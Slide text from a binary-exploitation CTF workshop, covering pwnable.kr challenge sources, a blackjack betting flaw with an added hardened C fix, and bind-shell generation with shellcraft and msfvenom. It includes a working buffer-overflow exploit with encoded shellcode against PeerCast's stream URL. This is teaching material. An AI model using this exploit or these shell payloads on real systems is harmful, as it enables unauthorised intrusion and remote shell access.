Purpose of the evening:
Purpose of the workshop:
To become able to solve CTF challenges that involve programs in binary form
None! We are here to learn. But the following will help:
Note: Vulnerability = a flaw in software that affects the security of that software. Exploit = software that takes advantage of a vulnerability to achieve some goal that the vulnerable software was not intended to allow.
On your machine:
$ git clone https://github.com/RobertLarsen/ProsaWorkshop.git
$ cd ProsaWorkshop
$ vagrant up
$ cd ProsaWorkshop
$ vagrant suspend
$ cd ProsaWorkshop
$ git pull
$ vagrant destroy -f
$ vagrant up
Either:
$ cd ProsaWorkshop
$ vagrant ssh
Or (user=vagrant password=vagrant):
Mommy! what is PATH environment in Linux?
ssh cmd1@pwnable.kr -p2222 (pw:guest)
#include <stdio.h>
#include <string.h>

int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "flag")!=0;
    r += strstr(cmd, "sh")!=0;
    r += strstr(cmd, "tmp")!=0;
    return r;
}
int main(int argc, char* argv[], char** envp){
    putenv("PATH=/fuckyouverymuch");
    if(filter(argv[1])) return 0;
    system( argv[1] );
    return 0;
}
Daddy bought me a system command shell. but he put some filters to prevent me from playing with it without his permission… but I wanna play anytime I want!
ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)
#include <stdio.h>
#include <string.h>

int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "=")!=0;
    r += strstr(cmd, "PATH")!=0;
    r += strstr(cmd, "export")!=0;
    r += strstr(cmd, "/")!=0;
    r += strstr(cmd, "`")!=0;
    r += strstr(cmd, "flag")!=0;
    return r;
}

extern char** environ;
void delete_env(){
    char** p;
    for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
    delete_env();
    putenv("PATH=/no_command_execution_until_you_become_a_hacker");
    if(filter(argv[1])) return 0;
    printf("%s\n", argv[1]);
    system( argv[1] );
    return 0;
}
Hey! check out this C implementation of blackjack game! I found it online
http://cboard.cprogramming.com/c-programming/114023-simple-blackjack-program.html (http://korturl.dk/4nh)
I like to give my flags to millionaires.
how much money you got?
Running at : nc pwnable.kr 9009
All calls to rand():
// Line 229
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;
// Line 304
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;
// Line 374
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;
// Line 444
srand((unsigned) time(NULL)); //Generates random seed for rand() function
k=rand()%13+1;
// Line 514
srand((unsigned) time(NULL)); //Generates random seed for rand() function
random_card = rand()%4+1;
// Line 639
srand((unsigned) time(NULL) + 1); //Generates random seed for rand() function
z=rand()%13+1;

// Line 721
int betting() //Asks user amount to bet
{
    printf("\n\nEnter Bet: $");
    scanf("%d", &bet);

    if (bet > cash) //If player tries to bet more money than player has
    {
        printf("\nYou cannot bet more money than you have.");
        printf("\nEnter Bet: ");
        scanf("%d", &bet);
        return bet;
    }
    else return bet;
} // End Function

// Line 28
int bet;
// Line 723
printf("\n\nEnter Bet: $");
scanf("%d", &bet);
// If you win
cash = cash+bet;
// If you lose
cash = cash - bet;
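
The betting() code above checks the bet only once (the retry is returned unchecked), and the signed int bet is never checked for being negative before it is added to or subtracted from cash. A hardened replacement, as an added example that is not part of the workshop material or the original blackjack source; parse_bet() and read_bet() are hypothetical names, and the starting cash of 500 in main() is a constructed value:

```c
/* Added example: parse_bet() and read_bet() are hypothetical names. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Accept only a whole decimal number in [1, cash].
   Returns 0 and stores the bet on success, -1 otherwise. */
int parse_bet(const char *line, int cash, int *bet_out)
{
    char *end;
    long v;
    errno = 0;
    v = strtol(line, &end, 10);
    if (end == line || errno == ERANGE)
        return -1;                  /* no digits, or does not fit in a long */
    end += strspn(end, " \t\r\n");  /* allow trailing whitespace only */
    if (*end != '\0')
        return -1;                  /* trailing garbage such as "10abc" */
    if (v < 1 || v > cash)
        return -1;                  /* zero, negative, or more than cash */
    *bet_out = (int)v;              /* safe: 1 <= v <= cash <= INT_MAX */
    return 0;
}

/* Every attempt passes the same check, however many retries it takes.
   Returns the accepted bet, or -1 on EOF or read error. */
int read_bet(FILE *in, int cash)
{
    char line[64];
    int bet, c;
    while (fgets(line, sizeof line, in) != NULL) {
        if (strchr(line, '\n') == NULL && !feof(in)) {
            while ((c = fgetc(in)) != '\n' && c != EOF)
                ;                   /* over-long line: discard the rest */
            continue;
        }
        if (parse_bet(line, cash, &bet) == 0)
            return bet;
    }
    return -1;
}

int main(void)
{
    int bet = read_bet(stdin, 500); /* 500 is a constructed starting cash */
    printf("accepted bet: %d\n", bet);
    return bet < 0;
}
```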
Mommy! I made a lotto program for my homework.
do you want to play?
ssh lotto@pwnable.kr -p2222 (pw:guest)
vagrant@localhost:~$ time shellcraft -f r amd64.linux.bindsh 7777 >/dev/null
real 0m0.687s
user 0m0.241s
sys 0m0.320s
vagrant@localhost:~$ time msfvenom -p linux/x64/shell_bind_tcp LPORT=7777 >/dev/null 2>&1
real 0m6.595s
user 0m1.928s
sys 0m4.146s

vagrant@localhost:~$ find .repositories/metasploit-framework/modules/exploits/linux -name '*.rb' | xargs wc -l | sort -nr | tail -n 1
67 .repositories/metasploit-framework/modules/exploits/linux/http/peercast_url.rb

#!/usr/bin/env python2
from pwn import *
import sys

#Generated with:
#shellcraft i386.linux.findpeersh | msfvenom --encoder x86/shikata_ga_nai --bad-chars '\x00\x0a\x0d\x20\x2f\x3d\x3b' --arch x86 --platform linux --format python
buf = ""
buf += "\xbd\xf4\x6e\x99\x72\xd9\xe8\xd9\x74\x24\xf4\x5e\x2b"
buf += "\xc9\xb1\x10\x83\xee\xfc\x31\x6e\x10\x03\x6e\x10\x16"
buf += "\x9b\xf3\x8d\xbc\x63\x8d\x97\x1b\x32\xe7\x31\xc3\x8c"
buf += "\x7a\xf1\xd7\xf0\xef\x0e\x77\x3c\x6f\x8b\xb7\xdf\x2a"
buf += "\xe1\xda\xa9\x38\x63\x27\xf3\xf7\x1e\x18\x5b\xc5\x5f"
buf += "\x13\xa3\xbf\x37\xb3\x7c\x6f\xe7\x30\xeb\x40\x95\xdf"
buf += "\x85\x17\xba\x2e\x93\x42\x36\x08\xba\x5e\xc8"

r = remote(sys.argv[1], 80)
r.send('GET /stream/?' + 'A' * 780 + p32(0x080922f7) + buf + '\r\n\r\n')
r.interactive()
Intro time
Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration http://www.opensecuritytraining.info/IntroX86.html (12:08:24)
Introduction To Reverse Engineering Software http://www.opensecuritytraining.info/IntroductionToReverseEngineering.html (6:47:55)
Introduction To Software Exploits http://www.opensecuritytraining.info/Exploits1.html (9:38:54)